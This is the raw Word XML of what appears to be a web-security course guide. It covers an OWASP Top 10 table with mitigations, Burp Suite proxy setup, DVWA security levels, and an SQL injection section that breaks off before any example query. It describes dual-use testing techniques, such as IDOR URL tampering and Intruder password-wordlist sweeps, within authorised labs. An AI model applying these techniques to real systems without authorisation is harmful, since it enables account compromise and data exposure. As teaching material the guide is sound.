            <w:tcW w:type="dxa" w:w="4093"/>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 user can act outside their intended permissions — e.g. an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Insecure Direct Object Reference), where changing an ID in a URL like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">?invoice=1002</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">?invoice=1003</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> shows someone else's invoice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Enforce access checks on the server for every request; never trust a client-supplied ID alone</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A02 — Cryptographic Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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Sensitive data (passwords, card numbers) is stored or transmitted in cleartext, or with weak/outdated cryptography</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Encrypt sensitive data at rest and in transit (TLS); use strong, modern password hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A03 — Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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Untrusted input is passed directly into a command interpreter — most commonly SQL Injection, but also OS Command Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Use parameterised queries / prepared statements; never build queries by concatenating user input</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A04 — Insecure Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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 security flaw baked into the application's design itself, not just a coding bug — e.g. no rate limit on a password-reset feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Threat-model features during design, before any code is written</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A05 — Security Misconfiguration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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Default credentials left unchanged, unnecessary features enabled, directory listing left on, verbose error messages exposed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Harden configurations, remove default accounts, disable unneeded features</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A06 — Vulnerable &amp; Outdated Components</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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The application uses outdated libraries or frameworks with publicly known CVEs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Keep a dependency inventory and patch on a schedule</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A07 — Identification &amp; Authentication Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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Weak session handling, predictable session tokens, or login flows that allow credential stuffing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Strong session management, multi-factor authentication, account lockout</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2047"/>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A08 (syllabus) — SSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4093"/>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The server can be tricked into making a request to an internal address on the attacker's behalf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3606"/>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Validate and restrict what addresses a server-side request may reach</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 Burp Suite Community Edition</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp Suite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the standard tool for manual web application testing. It sits as a proxy between your browser and the target website, so every request and response passes through it and can be inspected or modified.</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2242"/>
        <w:gridCol w:w="7504"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7504"/>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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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FoxyProxy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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 browser extension that quickly switches your browser's traffic to route through Burp's local proxy listener (usually </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">127.0.0.1:8080</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Proxy intercept</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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When intercept is on, Burp pauses each request so you can view or edit it before choosing </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Forward</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Repeater</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Resends a single captured request repeatedly with small modifications — ideal for manually testing an injection point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Intruder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Automates sending many variations of a request — e.g. a </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sniper</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> attack that cycles a wordlist of passwords through a login form (credential-stuffing tests)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Decoder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Quickly encodes or decodes data (Base64, URL encoding, hashing) found in requests</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2242"/>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Target scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="750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Restricts Burp's tools to only the domains you are authorised to test</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Install FoxyProxy and add a profile pointing to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="7A1F1F"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:8080</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Burp's default proxy listener).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Burp Suite (Community Edition), go to Proxy → Intercept, and confirm “Intercept is on”.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Switch the browser to the FoxyProxy profile and import/trust Burp's CA certificate for HTTPS interception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Browse to the DVWA login page; the request appears in Burp's Intercept tab — click </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Forward</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to let it through, or edit it first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Set the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Target scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the DVWA host only, and use “Show only in-scope items” to keep the UI focused.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="90" w:line="290"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Send an interesting request to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Repeater</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Ctrl+R) for manual, repeated testing, or to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Intruder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for automated payload sweeps.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:left w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:bottom w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:right w:val="single" w:color="A33A3A" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FBEAEA" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="A33A3A"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⛔ Lab Safety — Authorised Lab Only</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Configure Burp's target scope to the DVWA/Metasploitable lab IP only before sending anything to Intruder — an unscoped Intruder attack can accidentally send traffic outside the authorised target.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="180"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 DVWA Setup and Security Levels</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA (Damn Vulnerable Web Application)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a PHP/MySQL application deliberately built with common vulnerabilities, used for safe, legal practice. It has adjustable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">security levels</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Low has no protection, Medium has partial/flawed protection, and High/Impossible have strong protection — letting a student see both a raw vulnerability and a (sometimes bypassable) attempted fix.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="160" w:before="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.4 SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext/>
        <w:spacing w:after="120" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0E7C7B"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Definition and how it works</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection (SQLi)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="222222"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> happens when user input is inserted directly into a database query without proper handling, letting an attacker change the query's logic.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="dxa" w:w="9746"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="B8860B" w:sz="6"/>
          <w:left w:val="single" w:color="B8860B" w:sz="6"/>
          <w:bottom w:val="single" w:color="B8860B" w:sz="6"/>
          <w:right w:val="single" w:color="B8860B" w:sz="6"/>
          <w:insideH w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:insideV w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9746"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9746"/>
            <w:shd w:fill="FFF6E5" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="150"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="150"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:after="80"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="B8860B"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✎ Example — Manual error-based SQLi (analogy + example)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:line="280"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="222222"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">A login form builds a query like </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="7A1F1F"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
